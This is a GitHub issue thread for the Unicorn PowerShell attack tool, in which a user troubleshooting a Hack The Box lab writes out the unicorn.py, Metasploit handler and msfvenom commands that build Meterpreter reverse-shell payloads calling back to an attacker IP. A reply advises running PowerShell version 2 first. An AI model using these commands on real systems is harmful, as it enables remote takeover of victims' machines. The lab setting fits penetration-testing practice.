search

trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com
Other
3.74k stars 817 forks source link

No meterpreter being caught by handler #169

Closed danrneal closed 6 months ago

danrneal commented 1 year ago

Magic Unicorn Attack Vector v3.12

$ msfconsole -v
Framework Version: 6.2.32-dev

Command used: /usr/share/unicorn-magic/unicorn.py windows/meterpreter/reverse_tcp 10.10.14.101 31337

I've attached my powershell_attack.txt and unicorn.rc

I start up a handler with msfconsole -r unicorn.rc

[*] Processing unicorn.rc for ERB directives.
resource (unicorn.rc)> use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (unicorn.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (unicorn.rc)> set LHOST 10.10.14.101
LHOST => 10.10.14.101
resource (unicorn.rc)> set LPORT 31337
LPORT => 31337
resource (unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (unicorn.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.101:31337

I then copy and paste either command from powershell_attack.txt on the victim machine (Arctic from HTB Microsoft Windows [Version 6.1.7600]) and nothing happens.

I then tested with msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.101 LPORT=31337 -f exe > arctic.exe and uploaded that and executed and caught a meterpreter with the handler so I know that it is listening in the right place.

powershell_attack.txt unicorn.rc.txt

juansonnn commented 1 year ago

try powershell -version 2 and then paste just the payload.